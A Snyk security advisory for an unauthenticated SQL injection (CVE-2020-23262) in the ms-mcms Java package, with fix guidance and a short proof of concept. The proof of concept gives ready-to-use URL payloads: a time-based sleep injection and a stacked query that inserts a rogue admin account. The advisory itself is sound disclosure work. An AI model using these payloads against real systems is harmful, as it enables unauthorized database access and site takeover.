SQL Injection Affecting net.mingsoft:ms-mcms package, versions [,5.1)
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-NETMINGSOFT-2397345
- published 10 Feb 2022
- disclosed 9 Feb 2022
- credit Unknown
Introduced: 9 Feb 2022
CVE-2020-23262 Open this link in a new tabHow to fix?
Upgrade net.mingsoft:ms-mcms to version 5.1 or higher.
Overview
Affected versions of this package are vulnerable to SQL Injection via the orderby parameter which isn't handled correctly through the /mcms/view.do endpoint while unauthenticated.
PoC
- Enumerate an available ID using a tool likeBurp Intruder in the
<ms-mcms address>:<port>/ms-mcms/mcms/view.do?id=<id number>.
1.1) Whenever an ID is unavailable you will receive an error, otherwise it'll be a status code 200.
Once an ID is found, browse to:
<ms-mcms address>:<port>/ms-mcms/mcms/view.do?id=<the id that is available>&&order=desc&orderby=content_category_id%60,(select%201%20from%20(select%20if(1=1,sleep(3),sleep(0)))a)%23It is also possible to inject an admin account: `
: /ms-mcms/mcms/view.do?id=221&&order=desc&orderby=content_category_id%60;insert%20into%20manager%20(manager_name,manager_nickname,manager_password,manager_roleid)%20values%20('admin','admin','9d8622060de5f24937b60585c3f4d66b',48)%23